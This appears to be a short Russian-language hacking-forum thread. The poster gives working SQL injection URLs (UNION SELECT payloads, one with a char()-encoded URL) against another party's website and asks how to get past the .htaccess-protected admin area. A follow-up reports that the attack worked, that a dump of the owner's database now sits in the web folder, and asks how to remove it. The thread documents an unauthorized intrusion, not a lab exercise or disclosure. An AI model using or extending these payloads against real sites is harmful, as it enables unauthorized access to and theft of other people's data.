Нашел сайт, где есть уязвимость вида XSS и SQL-injection. Там такая картина: Если написать в адресе: http://www.site.ru/in.php?part=dvn&det=null+union+SELECT+null,now(),now(),null,12,34,null,null/* То выдается то, что ожидаю: заголовок статьи - "12", сама статья - 34. Но дальше возник вопрос: а мне-то что до этого? Я могу сделать insert в таблицу новостей, но хочется пойти дальше тупого варварства. Я написал такой адрес: http://www.site.ru/in.php?part=dvn&det=null+union+SELECT+null,now(),now(),null,12,char(104,116,116,112,58,47,47,102,111,114,117,109,46,97,110,116,105,99,104,97,116,46,114,117,47,110,101,119,116,104,114,101,97,100,46,112,104,112),null,null/* Вместо ожидаемого инклюда постороннего файла, пишется его название. Как вы думаете, в каком направлении дальше рыть (админский сайт защищен .htaccess)?
Вполне сработало, спасибо! Только админ вряд ли обрадуется, увидев у себя в веб-папке дамп своей базы Не подскажет ли кто, как его удалить?